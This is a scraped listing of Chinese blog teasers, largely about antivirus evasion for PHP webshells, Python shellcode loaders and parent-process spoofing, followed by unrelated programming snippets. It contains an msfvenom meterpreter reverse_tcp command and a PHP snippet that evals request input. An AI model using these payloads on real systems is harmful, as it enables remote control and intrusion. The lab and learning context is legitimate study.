- PHP一句话木马免杀方式汇总
A 八方
php开发语言安全web安全网络
目录PHP一句话木马免杀学习一句话木马的变形1.相同功能函数替换2.使用变量3.使用字符串拼接、大小写混淆、字符串逆序组合4.自定义函数5.回调函数6.str_replace函数7.base64_decode函数(编码绕过)8.parse_str函数9.preg_replace函数10."."操作符11.file_put_contents函数12.通过PHP的动态函数PHP一句话木马免杀学习简单了
- 防御保护--防病毒网关
为梦想而战@大学生
防御保护服务器网络网络安全安全
目录网络安全之防病毒网关--恶意软件按照传播方式分类熊猫烧香蠕虫病毒木马病毒按照功能分类后门勒索挖矿恶意代码的特征下载特征后门特征信息收集特性自身隐藏特性文件感染特性网络攻击特性病毒传播途径恶意代码的免杀技术反病毒技术单机反病毒杀毒软件网关反病毒反病毒防火墙---AV网络安全之防病毒网关--恶意软件按照传播方式分类病毒病毒---一种基于硬件和操作系统的程序,具有感染和破坏能力,这与病毒程序的结构有
- 进程链信任-父进程欺骗
coleak
#渗透测试windows安全
文章目录前记普通权限的父进程欺骗ShllCode上线进程提权基础进程提权注入前记父进程欺骗作用:进程链信任免杀进程提权检测:etw普通权限的父进程欺骗#include#include#includeDWORDgetpid(LPCTSTRProcessName){HANDLEhProceessnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);if(
- 指纹识别描述
Lyx-0607
笔记
指纹由于其终身不变性、唯一性和方便性,几乎已成为生物特征识别的代名词。通常我们说的指纹就是人的手指末端正面皮肤上凸凹不平的纹线,纹线规律地排列形成不同的纹型。而本节所讲的指纹是指网站CMS指纹识别、计算机操作系统及Web容器的指纹识别等。应用程序一般在html、js、css等文件中多多少少会包含一些特征码,比如WordPress在robots.txt中会包含wp-admin、首页index.php
- 渗透测试-木马免杀的几种方式
白面安全猿
前言免杀,又叫免杀毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为。免杀的基本特征是破坏特征,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。免杀技术也并不是十恶不赦的,例如,在软件保护所用的加密产品(比如壳)中,有一些会被杀毒软件认为是木马病
- Avaddon勒索病毒解密工具
熊猫正正
勒索病毒专题报告勒索病毒解密勒索病毒安全威胁分析系统安全
前言Avaddon勒索病毒被笔者称为2020年全球十大流行勒索病毒之一,其首次出现于2020年6月在俄罗斯某地下黑客论坛开始出售,该勒索病毒使用C++语言进行编写,采用RSA-2048和AES-256加密算法对文件进行加密,该勒索病毒的传播方式多种多样,前期主要通过垃圾邮件附件JS/PowerShell恶意脚本等无文件技术进行传播,免杀效果非常好,发展到后面通过Phorpiex僵尸网络进行传播,同
- PE 特征码定位修改程序清单 uiAccess
涟幽516
业余学习windows微软c++
requestedExecutionLevellevel="asInvoker"uiAccess="false"可以修改这一行来启用禁用原程序的盾牌图标,似乎作用不大。以前没事写的一个小玩意,记录一下。等同于这里的设置:截图代码如下:#include#include#include#include#include#includeusingnamespacestd;charHEX[16]={'0',
- Python常见的免杀方式
Lyx-0607
笔记
10.1节介绍了通过msfvenom生成shellcode,并通过Python程序加载执行,又介绍了如何将Python的.py文件生成为exe文件。使用pyinstaller生成的可执行文件本身就具有一定的免杀能力,但是在与杀毒软件对抗时,部分杀毒软件也可以通过分析可执行文件的内容来判断文件是否为恶意程序,导致这些代码仍然具有被杀的可能。对于用msfvenom生成的shellcode,在生成时可以
- ISCTF-Reverse-WriteUP
shangwenDD
赛后题解网络安全算法安全c++pythonc语言
crakme[Shangwendada,wakappxcdone]法1其实应该本来想考的是upx壳,但是似乎出题人没想到可以直接运行的问题…法2首先查壳脱壳发现脱不了放入010Editor查看并改特征码载入ida里面验证flag正确mfx_re[Shangwendadadone]这玩意瞅着真熟悉UPX老哥,改了特征码修复文件file_path='mfx_re'#替换成你的二进制文件路径withop
- 创新方案|经济下行周期下企业避免杀价内卷侵蚀利润亟需5种创新定价策略
Runwise 即能创新
创新战略增长策略人工智能软件工程创业创新大数据
随着通胀持续、全球经济衰退逆风让消费者谨慎支出,绝大多数企业都担心如何刺激购买且保持利润率。在本研究认为,公司不应该简单地调整价格,而应该创造性地借鉴其他行业定价打法,通过创新定价选项的组合,增加向客户计价的新方法。推荐可用的5大定价策略,能取悦现有客户并吸引新客户:满足具有不同使用需求的买家,吸引预算紧张的人,刺激喜欢好交易的客户购买,在产品价值不确定时实现优惠价格,并提高业务效率。经济逆风周期
- 某客户单位模拟应急演练(双网卡状态下,Socks5隧道搭建进行内网攻击)
Acczdy
渗透学习网络安全
此文章为客户单位要求进行应急演练,因此按客户要求进行演习,文章较水,大佬请勿喷,谢谢。文中内容,均属虚构,仅供学习使用,请勿进行真实攻击描述模拟对客户内部办公网络进行攻击,通过各种手段,将后门文件传入客户的电脑中,其中有几个关键因素:后门文件需要过杀软(此处不涉及,不会免杀,明面上见到的免杀工具尝试了很多,被自己虚拟机360、奇安信、火绒都给干死了)客户电脑必须双网卡,即既可以通内部办公网络,又可
- 揭密某黑产组织新型免杀攻击样本
熊猫正正
网络安全
你以为躲在这里就找不到你吗?没用的,你那样拉风的男人无论在哪,都像黑夜里的莹火虫那样的鲜明、那样的出众,你那忧郁的眼神稀嘘的胡渣子,神乎其技的刀法,还有那杯Drymartine,都深深的迷住了我……概述一年一度的活动结束了,各位红蓝队的兄弟们都辛苦了,活动虽然己经结束,但是真实的攻击从来没有停止过,安全意识要常态化,跟之前一样笔者及笔者团队今年仍然以协助其他团队进行样本的分析、溯源等相关工作,主要
- 爆改自用免杀2.0-绕过主流杀软机制
知攻善防实验室
安全免杀Shellcode渗透测试网络安全免杀
关注本公众号,长期推送漏洞文章知攻善防实验室红蓝对抗,Web渗透测试,红队攻击,蓝队防守,内网渗透,漏洞分析,漏洞原理,开源工具,社工钓鱼,网络安全。74篇原创内容公众号免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!文章开头,上次写的免杀
- 记一次“微信交流群“内免杀木马分析以及溯源
知攻善防实验室
web安全安全威胁分析网络安全安全架构安全
关注本公众号,长期推送技术文章知攻善防实验室红蓝对抗,Web渗透测试,红队攻击,蓝队防守,内网渗透,漏洞分析,漏洞原理,开源工具,社工钓鱼,网络安全。73篇原创内容公众号免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!反编译得到源码拿到文件
- 2、安全开发-Python-Socket编程&端口探针&域名爆破&反弹Shell&编码免杀
++
Pythonpython网络安全
用途:个人学习笔记,欢迎指正!目录主要内容:一、端口扫描(未开防火墙情况)1、Python关键代码:2、完整代码:多线程配合Queue进行全端口扫描二、子域名扫描三、客户端,服务端Socket编程通信cmd命令执行1、客户端:2、服务端:四、python代码shellCode编码免杀&后门上线1、CS生成shellcode2、python未编码:二进制shellcode执行,CS上线代码3、将sh
- 测试 35 个 webshell 检测引擎的查杀结果
知白y
网络安全
最近发现了一个有意思的使用分支对抗技术制作的PHPWebshell开源项目,共数十个查杀引擎免杀,项目地址:https://github.com/icewolf-sec/PerlinPuzzle-Webshell-PHP什么是WebshellWebshell是一种恶意脚本,它能让攻击者通过HTTP或HTTPS通信协议对服务器进行远程管理。Webshell由服务端和客户端两部分构成,客户端向服务端发
- python免杀
只喜欢打乒乓球
python开发语言网络安全web安全
实验靶机:win10攻击机:kali192.168.117.1291.先在kali上输入msfvenom-pwindows/x64/meterpreter/reverse_tcpLHOST=192.168.117.129LPORT=4444-fpy打开vs新建一个python文件、写入64位加载#!/usr/bin/pythonimportctypes#这里直接粘贴刚刚msf生成的shellcod
- 测试 35 个 webshell 检测引擎的查杀结果
AtlantisLab
网络安全
最近发现了一个有意思的使用分支对抗技术制作的PHPWebshell开源项目,共数十个查杀引擎免杀,项目地址:https://github.com/icewolf-sec/PerlinPuzzle-Webshell-PHP什么是WebshellWebshell是一种恶意脚本,它能让攻击者通过HTTP或HTTPS通信协议对服务器进行远程管理。Webshell由服务端和客户端两部分构成,客户端向服务端发
- silic group第五版php木马,php一句话后门特征码与免杀-zz
无脸纸片人
silicgroup第五版php木马
作者:YoCoSmart来自:SilicGroupHackerArmy[BlackBap.Org]首先我们要明白什么是一句话木马。“一句话”是一种特征性很强的脚本后门的统称和简称,其特征就是代码很短,短到甚至只有一句话,但是却能用这句很短的代码,完成无数的复杂功能。我们来对下面这样的一个一句话进行简单剖析:复制代码这是php的一句话后门中最普遍的一种。它的工作原理是这样的:首先存在一个变量,变量名
- 测试 35 个 webshell 检测引擎的查杀结果
云宝的黑客对抗日记
网络安全
最近发现了一个有意思的使用分支对抗技术制作的PHPWebshell开源项目,共数十个查杀引擎免杀,项目地址:https://github.com/icewolf-sec/PerlinPuzzle-Webshell-PHP什么是WebshellWebshell是一种恶意脚本,它能让攻击者通过HTTP或HTTPS通信协议对服务器进行远程管理。Webshell由服务端和客户端两部分构成,客户端向服务端发
- 红日靶场2打点记录
曼达洛战士
安全
因为之前成功用冰蝎免杀360,把权限反弹到了MSF上,然后MSF把权限反弹到CS上所以这次咱们走捷径直接通过反序列化漏洞连接(就是关掉360)因为权限弹来弹去感觉好麻烦提示大家如果想要免杀360千万别学我,我是之前免杀360过了所以走此捷径将权限反弹到CS工具上(之前有360的时候一直提权不成功)这里我先关掉360做一个对照组,这里先体验一下无360的环境输入shellipconfig/all我们
- 红日靶场2 ATT&&CK攻击
曼达洛战士
安全
360免杀其实没有你想象的那么难首先最重要的是你要用免杀脚本对你所生成的木马病毒进行加密然后加密系统的内核,就是上一篇文章所提及的是通过两次加密之后所输出的结果,让360无法感知到,然后先通过java反序列化工具将冰蝎工具的JSP后门代码上传上去,这个不会被360工具发现,因为冰蝎的代码自带免杀效果,冰蝎因为其特殊的构型,有免杀的效果,然后不得不说一下今天早上遇到的事情,是kali攻击机怎么能无法
- WEB攻防-通用漏洞&文件上传&二次渲染&.htaccess&变异免杀
@墨竹
前端安全php
目录知识点详细点文件二次渲染php删除规则例题CTF-Web入门-162CTF-Web入门-163CTF-Web入门-164CTF-Web入门-165CTF-Web入门-166CTF-Web入门-167CTF-Web入门-168CTF-Web入门-169-170知识点1、文件上传-二次渲染2、文件上传-简单免杀变异3、文件上传-.htaccess妙用4、文件上传-PHP语言特性详细点1、检测层面:
- day 32 文件上传&二次渲染&.htaccess&变异免杀
匿名用户0x3c
小迪网安笔记安全
前言:#知识点:1、文件上传-二次渲染2、文件上传-简单免杀变异3、文件上传-.htaccess妙用4、文件上传-PHP语言特性#详细点:1、检测层面:前端,后端等2、检测内容:文件头,完整性,二次渲染等3、检测后缀:黑名单,白名单,MIME检测等4、绕过技巧:多后缀解析,截断,中间件特性,条件竞争等#本章课程内容:1、文件上传-CTF赛题知识点2、文件上传-中间件解析&编辑器安全3、文件上传-实
- day32WEB 攻防-通用漏洞&文件上传&二次渲染&.htaccess&变异免杀
aozhan001
小迪安全-2022年前端
本章节知识点:1、文件上传-二次渲染2、文件上传-简单免杀变异3、文件上传-.htaccess妙用4、文件上传-PHP语言特性前置知识:后门代码需要用特定格式后缀解析,不能以图片后缀解析脚本后门代码(解析漏洞除外)如:jpg图片里面有php后门代码,不能被触发,所以连接不上后门如果要图片后缀解析脚本代码,一般会利用包含漏洞或解析漏洞,还有.user.ini&.htaccess.htaccess文件
- webshell以及免杀方式
搬码人
Webshell简介Webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称作为一种网页后门。攻击者在入侵了一个网站后,通常将asp或php后门文件与网站服务器Web目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的Webshell的作用1、维持远程访问2、全线提升3、发动网
- php免杀
weixin_45111459
php
php中有一个有意思的特性,就是字符串也能使用自加运算符++c=$_GET['id'];}}$cc=newtest;$cc=$cc->c;eval($cc);
- 远程控制---实验十:灰鸽子远控软件使用实验
DDdd...
网络攻防实验网络windows服务器
目录一、实验目的及要求二、实验原理三、实验环境四、实验步骤及内容实验步骤一实验步骤二:灰鸽子体验五、实验总结六、分析与思考一、实验目的及要求1、掌握经典远控木马的原理2、掌握“灰鸽子”木马的使用方法二、实验原理“灰鸽子”是现在网络上非常流行的一种木马,由两部分组成,一是控制端(主程序),一是服务端(也叫受控端)。任一部分都会被主流的杀毒软件查杀,但随着其不断衍生新的变种和一些免杀技巧经常绕过一些主
- 【网络安全】简单的免杀方法(基本知识)
网安导师小李
web安全安全网络网络安全运维bug
目录一、免杀的概念二、免杀系统搭建三、免杀工具介绍1、myccl2、C32asm3、OD4、LordPE5、ImportREC6、VC++6.0/visualstudio7、数字签名四、关于杀软排名不分前后1、360。2、金山毒霸3、江民4、瑞星5、安天防线6、卡巴斯基7、NOD328、诺顿9、小红伞,木伞10、BD五、杀软的查杀方法1、最基础的查杀2.1、静态启发式2.2、动态启发式3、HIPS
- vb如何获取鼠标形状的特征码
专注VB编程开发20年
计算机外设VB6光标形状
vb如何获取鼠标形状的特征码好像按键精灵有一个GetCursorShape()函数可以获取特征码,不知道VB6能不能实现类似的功能?附注:1最好是机器无关的,不是也可以。2特征码就是一串数字,用来区分不同的鼠标形状。3获取鼠标形状的位图的操作已经实现,现在就是如何通过这个位图来获取特征码。4目前我的实现方法是将位图的Byte数组转换为二进制,然后获取1和0的个数,最后相加获得特征码,有没有比这种方
- java解析APK
3213213333332132
javaapklinux解析APK
解析apk有两种方法
1、结合安卓提供apktool工具,用java执行cmd解析命令获取apk信息
2、利用相关jar包里的集成方法解析apk
这里只给出第二种方法,因为第一种方法在linux服务器下会出现不在控制范围之内的结果。
public class ApkUtil
{
/**
* 日志对象
*/
private static Logger
- nginx自定义ip访问N种方法
ronin47
nginx 禁止ip访问
因业务需要,禁止一部分内网访问接口, 由于前端架了F5,直接用deny或allow是不行的,这是因为直接获取的前端F5的地址。
所以开始思考有哪些主案可以实现这样的需求,目前可实施的是三种:
一:把ip段放在redis里,写一段lua
二:利用geo传递变量,写一段
- mysql timestamp类型字段的CURRENT_TIMESTAMP与ON UPDATE CURRENT_TIMESTAMP属性
dcj3sjt126com
mysql
timestamp有两个属性,分别是CURRENT_TIMESTAMP 和ON UPDATE CURRENT_TIMESTAMP两种,使用情况分别如下:
1.
CURRENT_TIMESTAMP
当要向数据库执行insert操作时,如果有个timestamp字段属性设为
CURRENT_TIMESTAMP,则无论这
- struts2+spring+hibernate分页显示
171815164
Hibernate
分页显示一直是web开发中一大烦琐的难题,传统的网页设计只在一个JSP或者ASP页面中书写所有关于数据库操作的代码,那样做分页可能简单一点,但当把网站分层开发后,分页就比较困难了,下面是我做Spring+Hibernate+Struts2项目时设计的分页代码,与大家分享交流。
1、DAO层接口的设计,在MemberDao接口中定义了如下两个方法:
public in
- 构建自己的Wrapper应用
g21121
rap
我们已经了解Wrapper的目录结构,下面可是正式利用Wrapper来包装我们自己的应用,这里假设Wrapper的安装目录为:/usr/local/wrapper。
首先,创建项目应用
&nb
- [简单]工作记录_多线程相关
53873039oycg
多线程
最近遇到多线程的问题,原来使用异步请求多个接口(n*3次请求) 方案一 使用多线程一次返回数据,最开始是使用5个线程,一个线程顺序请求3个接口,超时终止返回 缺点 测试发现必须3个接
- 调试jdk中的源码,查看jdk局部变量
程序员是怎么炼成的
jdk 源码
转自:http://www.douban.com/note/211369821/
学习jdk源码时使用--
学习java最好的办法就是看jdk源代码,面对浩瀚的jdk(光源码就有40M多,比一个大型网站的源码都多)从何入手呢,要是能单步调试跟进到jdk源码里并且能查看其中的局部变量最好了。
可惜的是sun提供的jdk并不能查看运行中的局部变量
- Oracle RAC Failover 详解
aijuans
oracle
Oracle RAC 同时具备HA(High Availiablity) 和LB(LoadBalance). 而其高可用性的基础就是Failover(故障转移). 它指集群中任何一个节点的故障都不会影响用户的使用,连接到故障节点的用户会被自动转移到健康节点,从用户感受而言, 是感觉不到这种切换。
Oracle 10g RAC 的Failover 可以分为3种:
1. Client-Si
- form表单提交数据编码方式及tomcat的接受编码方式
antonyup_2006
JavaScripttomcat浏览器互联网servlet
原帖地址:http://www.iteye.com/topic/266705
form有2中方法把数据提交给服务器,get和post,分别说下吧。
(一)get提交
1.首先说下客户端(浏览器)的form表单用get方法是如何将数据编码后提交给服务器端的吧。
对于get方法来说,都是把数据串联在请求的url后面作为参数,如:http://localhost:
- JS初学者必知的基础
百合不是茶
js函数js入门基础
JavaScript是网页的交互语言,实现网页的各种效果,
JavaScript 是世界上最流行的脚本语言。
JavaScript 是属于 web 的语言,它适用于 PC、笔记本电脑、平板电脑和移动电话。
JavaScript 被设计为向 HTML 页面增加交互性。
许多 HTML 开发者都不是程序员,但是 JavaScript 却拥有非常简单的语法。几乎每个人都有能力将小的
- iBatis的分页分析与详解
bijian1013
javaibatis
分页是操作数据库型系统常遇到的问题。分页实现方法很多,但效率的差异就很大了。iBatis是通过什么方式来实现这个分页的了。查看它的实现部分,发现返回的PaginatedList实际上是个接口,实现这个接口的是PaginatedDataList类的对象,查看PaginatedDataList类发现,每次翻页的时候最
- 精通Oracle10编程SQL(15)使用对象类型
bijian1013
oracle数据库plsql
/*
*使用对象类型
*/
--建立和使用简单对象类型
--对象类型包括对象类型规范和对象类型体两部分。
--建立和使用不包含任何方法的对象类型
CREATE OR REPLACE TYPE person_typ1 as OBJECT(
name varchar2(10),gender varchar2(4),birthdate date
);
drop type p
- 【Linux命令二】文本处理命令awk
bit1129
linux命令
awk是Linux用来进行文本处理的命令,在日常工作中,广泛应用于日志分析。awk是一门解释型编程语言,包含变量,数组,循环控制结构,条件控制结构等。它的语法采用类C语言的语法。
awk命令用来做什么?
1.awk适用于具有一定结构的文本行,对其中的列进行提取信息
2.awk可以把当前正在处理的文本行提交给Linux的其它命令处理,然后把直接结构返回给awk
3.awk实际工
- JAVA(ssh2框架)+Flex实现权限控制方案分析
白糖_
java
目前项目使用的是Struts2+Hibernate+Spring的架构模式,目前已经有一套针对SSH2的权限系统,运行良好。但是项目有了新需求:在目前系统的基础上使用Flex逐步取代JSP,在取代JSP过程中可能存在Flex与JSP并存的情况,所以权限系统需要进行修改。
【SSH2权限系统的实现机制】
权限控制分为页面和后台两块:不同类型用户的帐号分配的访问权限是不同的,用户使
- angular.forEach
boyitech
AngularJSAngularJS APIangular.forEach
angular.forEach 描述: 循环对obj对象的每个元素调用iterator, obj对象可以是一个Object或一个Array. Iterator函数调用方法: iterator(value, key, obj), 其中obj是被迭代对象,key是obj的property key或者是数组的index,value就是相应的值啦. (此函数不能够迭代继承的属性.)
- java-谷歌面试题-给定一个排序数组,如何构造一个二叉排序树
bylijinnan
二叉排序树
import java.util.LinkedList;
public class CreateBSTfromSortedArray {
/**
* 题目:给定一个排序数组,如何构造一个二叉排序树
* 递归
*/
public static void main(String[] args) {
int[] data = { 1, 2, 3, 4,
- action执行2次
Chen.H
JavaScriptjspXHTMLcssWebwork
xwork 写道 <action name="userTypeAction"
class="com.ekangcount.website.system.view.action.UserTypeAction">
<result name="ssss" type="dispatcher">
- [时空与能量]逆转时空需要消耗大量能源
comsci
能源
无论如何,人类始终都想摆脱时间和空间的限制....但是受到质量与能量关系的限制,我们人类在目前和今后很长一段时间内,都无法获得大量廉价的能源来进行时空跨越.....
在进行时空穿梭的实验中,消耗超大规模的能源是必然
- oracle的正则表达式(regular expression)详细介绍
daizj
oracle正则表达式
正则表达式是很多编程语言中都有的。可惜oracle8i、oracle9i中一直迟迟不肯加入,好在oracle10g中终于增加了期盼已久的正则表达式功能。你可以在oracle10g中使用正则表达式肆意地匹配你想匹配的任何字符串了。
正则表达式中常用到的元数据(metacharacter)如下:
^ 匹配字符串的开头位置。
$ 匹配支付传的结尾位置。
*
- 报表工具与报表性能的关系
datamachine
报表工具birt报表性能润乾报表
在选择报表工具时,性能一直是用户关心的指标,但是,报表工具的性能和整个报表系统的性能有多大关系呢?
要回答这个问题,首先要分析一下报表的处理过程包含哪些环节,哪些环节容易出现性能瓶颈,如何优化这些环节。
一、报表处理的一般过程分析
1、用户选择报表输入参数后,报表引擎会根据报表模板和输入参数来解析报表,并将数据计算和读取请求以SQL的方式发送给数据库。
2、
- 初一上学期难记忆单词背诵第一课
dcj3sjt126com
wordenglish
what 什么
your 你
name 名字
my 我的
am 是
one 一
two 二
three 三
four 四
five 五
class 班级,课
six 六
seven 七
eight 八
nince 九
ten 十
zero 零
how 怎样
old 老的
eleven 十一
twelve 十二
thirteen
- 我学过和准备学的各种技术
dcj3sjt126com
技术
语言VB https://msdn.microsoft.com/zh-cn/library/2x7h1hfk.aspxJava http://docs.oracle.com/javase/8/C# https://msdn.microsoft.com/library/vstudioPHP http://php.net/manual/en/Html
- struts2中token防止重复提交表单
蕃薯耀
重复提交表单struts2中token
struts2中token防止重复提交表单
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
蕃薯耀 2015年7月12日 11:52:32 星期日
ht
- 线性查找二维数组
hao3100590
二维数组
1.算法描述
有序(行有序,列有序,且每行从左至右递增,列从上至下递增)二维数组查找,要求复杂度O(n)
2.使用到的相关知识:
结构体定义和使用,二维数组传递(http://blog.csdn.net/yzhhmhm/article/details/2045816)
3.使用数组名传递
这个的不便之处很明显,一旦确定就是不能设置列值
//使
- spring security 3中推荐使用BCrypt算法加密密码
jackyrong
Spring Security
spring security 3中推荐使用BCrypt算法加密密码了,以前使用的是md5,
Md5PasswordEncoder 和 ShaPasswordEncoder,现在不推荐了,推荐用bcrpt
Bcrpt中的salt可以是随机的,比如:
int i = 0;
while (i < 10) {
String password = "1234
- 学习编程并不难,做到以下几点即可!
lampcy
javahtml编程语言
不论你是想自己设计游戏,还是开发iPhone或安卓手机上的应用,还是仅仅为了娱乐,学习编程语言都是一条必经之路。编程语言种类繁多,用途各 异,然而一旦掌握其中之一,其他的也就迎刃而解。作为初学者,你可能要先从Java或HTML开始学,一旦掌握了一门编程语言,你就发挥无穷的想象,开发 各种神奇的软件啦。
1、确定目标
学习编程语言既充满乐趣,又充满挑战。有些花费多年时间学习一门编程语言的大学生到
- 架构师之mysql----------------用group+inner join,left join ,right join 查重复数据(替代in)
nannan408
right join
1.前言。
如题。
2.代码
(1)单表查重复数据,根据a分组
SELECT m.a,m.b, INNER JOIN (select a,b,COUNT(*) AS rank FROM test.`A` A GROUP BY a HAVING rank>1 )k ON m.a=k.a
(2)多表查询 ,
使用改为le
- jQuery选择器小结 VS 节点查找(附css的一些东西)
Everyday都不同
jquerycssname选择器追加元素查找节点
最近做前端页面,频繁用到一些jQuery的选择器,所以特意来总结一下:
测试页面:
<html>
<head>
<script src="jquery-1.7.2.min.js"></script>
<script>
/*$(function() {
$(documen
- 关于EXT
tntxia
ext
ExtJS是一个很不错的Ajax框架,可以用来开发带有华丽外观的富客户端应用,使得我们的b/s应用更加具有活力及生命力。ExtJS是一个用 javascript编写,与后台技术无关的前端ajax框架。因此,可以把ExtJS用在.Net、Java、Php等各种开发语言开发的应用中。
ExtJs最开始基于YUI技术,由开发人员Jack
- 一个MIT计算机博士对数学的思考
xjnine
Math
在过去的一年中,我一直在数学的海洋中游荡,research进展不多,对于数学世界的阅历算是有了一些长进。为什么要深入数学的世界?作为计算机的学生,我没有任何企图要成为一个数学家。我学习数学的目的,是要想爬上巨人的肩膀,希望站在更高的高度,能把我自己研究的东西看得更深广一些。说起来,我在刚来这个学校的时候,并没有预料到我将会有一个深入数学的旅程。我的导师最初希望我去做的题目,是对appe